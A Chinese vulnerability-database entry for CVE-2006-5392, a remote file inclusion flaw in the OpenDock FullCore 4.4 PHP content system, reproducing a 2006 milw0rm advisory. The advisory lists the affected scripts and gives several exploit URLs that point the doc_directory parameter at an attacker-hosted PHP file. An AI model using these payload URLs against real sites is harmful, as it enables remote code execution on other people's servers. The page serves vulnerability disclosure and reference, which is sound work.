OpenDock FullCore 处理用户请求输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111309 漏洞类型 输入验证
发布时间 2006-10-16 更新时间 2006-10-20
CVE编号 CVE-2006-5392 CNNVD-ID CNNVD-200610-314
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2570
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-314
|漏洞详情
OpenDockFullCore是开放源码的内容管理系统。OpenDockFullCore在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。OpenDockFullCore的sw/lib_cart/cart.php、sw/lib_cart/lib_cart.php、sw/lib_cart/lib_read_cart.php等脚本没有正确验证doc_directory参数的输入,攻击者可以通过包含本地或外部资源的任意文件导致执行任意PHP代码。
|漏洞EXP
---------------------------------------------------------------------------------
OpenDock FullCore <= v4.4 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule

Contact : matdhule@gmail.com

Application : OpenDock FullCore

Version : 4.4

Download : http://web.opendock.net//up_file/opendock_full_core_44_66_od.zip

---------------------------------------------------------------------------------

Vulnerability:

In folder sw we found vulnerability script index_sw.php.

-----------------------index_sw.php---------------------------------
<?php

include $doc_directory.$path_sw."lib_config/lib_sys_config.php";
include $doc_directory.$path_sw."lib_main/lib_main.php";

-------------------------------------------------------------------------

Input passed to the "$doc_directory" parameter in index_sw.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

sw/lib_cart/cart.php
sw/lib_cart/lib_cart.php
sw/lib_cart/lib_read_cart.php
sw/lib_cart/lib_sys_cart.php
sw/lib_cart/txt_info_cart.php
sw/lib_comment/comment.php
sw/lib_comment/find_comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php

And many others files...

---------------------------------------------------------------------------------

Exploit :

http://target.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt ?

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, bius, thama & all crews #nyubicrew, #e-c-h-o, @dalnet

# milw0rm.com [2006-10-16]
|参考资料

来源:XF
名称:opendock-docdirectory-file-include(29578)
链接:http://xforce.iss.net/xforce/xfdb/29578
来源:BID
名称:20573
链接:http://www.securityfocus.com/bid/20573
来源:MILW0RM
名称:2570
链接:http://www.milw0rm.com/exploits/2570
来源:VUPEN
名称:ADV-2006-4052
链接:http://www.frsirt.com/english/advisories/2006/4052
来源:OSVDB
名称:29915
链接:http://www.osvdb.org/29915
来源:OSVDB
名称:29914
链接:http://www.osvdb.org/29914
来源:OSVDB
名称:29913
链接:http://www.osvdb.org/29913
来源:OSVDB
名称:29912
链接:http://www.osvdb.org/29912
来源:OSVDB
名称:29911
链接:http://www.osvdb.org/29911
来源:OSVDB
名称:29910
链接:http://www.osvdb.org/29910
来源:OSVDB
名称:29909
链接:http://www.osvdb.org/29909
来源:OSVDB
名称:29908
链接:http://www.osvdb.org/29908
来源:OSVDB
名称:29907
链接:http://www.osvdb.org/29907
来源:OSVDB
名称:29906
链接:http://www.osvdb.org/29906
来源:SECUNIA
名称:22410
链接:http://secunia.com/advisories/22410
来源:MILW0RM
名称:2570
链接:http://milw0rm.com/exploits/2570